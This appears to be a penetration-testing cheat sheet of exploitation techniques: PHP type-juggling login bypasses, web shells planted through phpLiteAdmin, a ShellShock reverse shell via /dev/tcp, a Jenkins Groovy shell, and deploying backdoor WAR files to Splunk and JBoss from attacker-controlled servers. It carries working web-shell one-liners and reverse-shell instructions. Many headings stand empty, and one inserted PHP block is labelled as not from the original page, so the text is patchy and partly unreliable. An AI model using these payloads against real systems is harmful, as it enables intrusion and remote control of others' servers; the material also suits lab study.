Exploitation Techniques
Useful Commands
Testing for code execution:
sudo tcpdump -i tun0 ip proto \icmp -vv
powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName
$env:userdnsdomain
Decryption
Exploiting HTTP PUT Method
WebDAV
Enumerate PUT Method: Allowed File Types
Drupal Code Exec
Authentication required
Jenkins
Reference: HTB Jeeves
Script Console
Execute Groovy script reverse shell on the server
PHP Type Juggling
Method 1
'==' operator: Loose comparison
'===' operator: Strict comparison (Fix)
Type juggling means that if PHP decides that both operands look like numbers, even if they are actually strings, it converts them both and performs a numeric comparison.
PHP sees a number (0) followed by the letter "e" and treats the MD5 string as a number in exponential notation (e.g. 0462097431906509019562988736854, which is 0 × 10^462... = 0). Because both MD5 hashes start with "0e" and contain only digits after it, they both evaluate to 0, making them numerically equivalent.
When such a "magic hash" is compared loosely against the hash of the real password and both are treated as 0, the comparison evaluates to true, and you can log into the account without the valid password.
Method 2
Sending in the password POST data as an array.
Change this to:
Explanation: PHP is generous with how it handles comparing different types of data. So if the PHP is doing a string compare of a password from a database (or hard coded, as is the case here) against the user input, it might look like this:
strcmp returns where the two strings differ, as I can see in an interactive PHP terminal (run php -a):
If I pass in an array as one of the strings, PHP fails:
However, it is actually returning a NULL, and if that NULL is then compared to 0, it evaluates true:
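Both bypasses above, next to their hardened forms, as an added example that is not part of the original page (the check* function names and the sample password are hypothetical):

```php
<?php
// Added example, not from the original page: the two login-check bugs described
// above beside their hardened forms. Function names and values are hypothetical.

// Method 1: loose (==) comparison of two "magic" MD5 hashes. Both strings have
// the form 0e<digits>, so == compares them numerically as 0 == 0.
function checkPasswordLoose(string $storedHash, string $supplied): bool {
    return md5($supplied) == $storedHash;              // vulnerable
}
function checkPasswordStrict(string $storedHash, string $supplied): bool {
    return hash_equals($storedHash, md5($supplied));   // strict and timing-safe
}

$storedHash = md5('240610708');   // "0e462097431906509019562988736854"
var_dump(checkPasswordLoose($storedHash, 'QNKCDZO'));  // bool(true): bypass
var_dump(checkPasswordStrict($storedHash, 'QNKCDZO')); // bool(false)

// Method 2: strcmp() with an array. password[]=x in the POST body arrives as an
// array. On PHP 5/7 strcmp() then returns NULL (plus a warning) instead of an
// int, and NULL == 0 is true. On PHP 8 it throws a TypeError instead.
function checkPasswordStrcmp(string $password, $input): bool {
    return @strcmp($password, $input) == 0;            // vulnerable: NULL == 0
}
function checkPasswordStrcmpFixed(string $password, $input): bool {
    if (!is_string($input)) {                          // reject non-string input
        return false;
    }
    return hash_equals($password, $input);
}

$input = ['x'];   // constructed: what $_POST['password'] holds for password[]=x
try {
    var_dump(checkPasswordStrcmp('secret', $input));   // PHP 5/7: bool(true)
} catch (TypeError $e) {
    echo "PHP 8: strcmp() rejects the array: ", $e->getMessage(), "\n";
}
var_dump(checkPasswordStrcmpFixed('secret', $input));  // bool(false)
```

The fix in both cases is the same: never use == or an int-returning compare for credentials; use hash_equals() (or password_verify() for properly hashed passwords) and validate that the input is a string first.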
phpLiteAdmin v1.9
Requires Authentication + LFI
Exploitation:
Create a database:
Create a table with 1 field
Create a field, change the Type to TEXT, and enter our script:
<?php echo shell_exec($_GET["cmd"]); exit; ?>
<?php system($_REQUEST["cmd"]);?>
Exploit using LFI Vulnerability
MongoDB
Default Port:27017
Commands
Payload
ShellShock Vulnerability [CVE-2014-6271]
This vulnerability impacts Bash. Bash is not usually reachable through a web application but can be indirectly exposed through a Common Gateway Interface (CGI).
CGIs are commonly written in Python or Perl, but it is not uncommon to find (on old servers) CGIs written in shell or even C.
When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.
Apache needs to pass information to the CGI script. To do so, it uses environment variables, which are available inside the CGI script. This lets Apache easily pass every header (among other information) to the CGI. If you have an HTTP header named Blah in your request, you will have an environment variable named HTTP_BLAH available in your CGI.
Fingerprint directories such as /cgi-sys, /cgi-mod, /cgi-bin, /session_login.cgi, etc.
Theory
The source of the issue is that Bash imports function definitions from its environment variables, and keeps parsing past the end of the function body.
First, we need to declare that the environment variable is a function using (). Then we add an empty body for the function. Finally, we can append the command we want to run after the function declaration. More details can be found in the following email on oss-sec
Apache uses environment variables to pass headers to the CGI. Since it is a Bash-based CGI, we will be able to run arbitrary commands by declaring an empty function and adding a command after this declaration.
Exploitation
Vulnerable Headers:
Referer
User-Agent
() { ignored;}; is the ShellShock trigger (the empty function declaration)
/bin/bash -i starts an interactive Bash session
>& /dev/tcp/<IP>/<PORT> redirects standard output and standard error to the remote host (e.g. /dev/tcp/1.2.3.4/8080 redirects the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 reads standard input from the same socket. This should be 0<&1, but it works in both cases.
Reference: HTB - Beep
Splunk 7.0
Requires authenticated access to management console.
Download the release from https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz
Navigate to the "Manage Apps" and click on "Install app from file". Upload this file.
Reference:
JBoss
Admin-Console
Check for default credentials: admin::admin.
With admin privileges, we can upload a WAR file and gain a web shell.
Once uploaded, activate the WAR file within the console, after which the file can be accessed through the browser.
Default JMX-Console
Navigate to the JMX Console on the target host (http://<URL>:8080/jmx-console/)
If the JMX-Console is not password-protected, a malicious WAR file can be requested from an attacker-controlled server. This WAR file is downloaded and automatically deployed onto the JBoss server. This can be done via two methods:
Search for service=MainDeployer [Jboss.system] (Walkthrough: Reference)
Search for flavor=URL,type=DeploymentScanner [Jboss.deployment] (Walkthrough: Reference)
Exploitation
Download a WAR file backdoor.
JSP webshell: Fuzzdb
Host the malicious WAR file on an attacker-controlled server (python3 -m http.server).
Invoke a request to the hosted file (java.net.URL).
Sometimes outbound requests to the internet may be blocked. In that case, host the file locally.
If successful, you can access the uploaded file at <URL>:8080/cmd/cmd.jsp
Get the command GUI by following the instructions from the WAR file's git repo.